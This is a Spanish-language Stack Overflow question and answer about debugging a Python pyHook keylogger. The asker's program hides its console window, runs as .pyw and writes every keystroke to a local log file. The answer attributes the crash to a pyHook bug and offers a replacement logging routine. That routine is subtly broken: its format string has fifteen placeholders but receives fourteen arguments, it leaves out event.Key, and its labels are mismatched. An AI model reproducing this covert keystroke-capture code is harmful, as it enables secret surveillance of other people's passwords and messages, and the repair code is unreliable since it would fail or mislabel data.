# ¿Porque mi Keylogger en Python 3.6 guarda espacios y no las letras que registra?

Tags: python, python-3.x

El programa aparentemente funciona bien, crea el archivo pero en el solo escribe espacios en blanco en lugar de los caracteres que escribí.

Realmente necesito ayuda con esto ya que desconozco la razón de esto, yo lo guarde como .pyw

Aquí el código:

```
import win32api
import win32console
import win32gui    
import pyHook,pythoncom,sys,logging

win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
file_log = "C:\\KEYLOGGER\\Log.txt"

def OnKeyboardEvent(event):
        logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
        chr(event.Ascii)
        logging.log(10,chr(event.Ascii))    
        return True

hocks_manager = pyHook.HookManager()
hocks_manager.KeyDown=OnKeyboardEvent
hocks_manager.HookKeyboard()    
pythoncom.PumpMessages()
```

Al ejecutarlo en la consola, luego de pasarlo a .py, y escribir una tecla me sale el siguiente error

> ```
> C:\Users\mi pc\Project\Python>python keyl_a.py
> TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_
> code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'
> ```

Comment: Lanzalo **usando la consola** renombrando a `.py` para ver si lanza alguna excepción en la consola mientras se ejecuta. El código es correcto, probado en Windows 10, teclado físico  y Python 3.5 y funciona perfectamente. Yo al menos no puedo reproducir tu problema, guarda cada key presionada en una línea del txt sin problemas. ¿En que SO lo estas usando?

Answer (score 2):

Aparentemente se trataría de un bug de pyHook. Ocurre cuando el foco está puesto en una ventana cuyo titulo tiene caracteres "wide" o no ascii. El fix lamentablemente pasa por modificar pyHook. [Este enlace](https://stackoverflow.com/questions/26156633/pythoncom-crashes-on-keydown-when-used-hooked-to-certain-applications) te puede ayudar.

Con respecto a las teclas en blanco, te comento que a mi al menos no me ha funcionado el `chr(event.Ascii)`, pero si el `chr(event.Key)`. Te copio una rutina que detalla más la información del evento de teclado que tal vez te ayude:

```
def OnKeyboardEvent(event):

        logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')

        logtxt = """\
        MessageName: {}
        Message    : {}
        Time       : {}
        Window     : {}
        WindowName : {}
        Ascii      : {} {}
        Key        : {} {}
        KeyID      : {}
        ScanCode   : {}
        Extended   : {}
        Injected   : {}
        Transition : {}
        ---------------------------
        """.format(event.MessageName,
                   event.Message,
                   event.Time,
                   event.Window,
                   event.WindowName,
                   event.Ascii, chr(event.Ascii),
                   event.KeyID, chr(event.KeyID),
                   event.ScanCode,
                   event.Extended,
                   event.Injected,
                   event.Alt,
                   event.Transition)


        logging.log(10,logtxt)    
        return True
```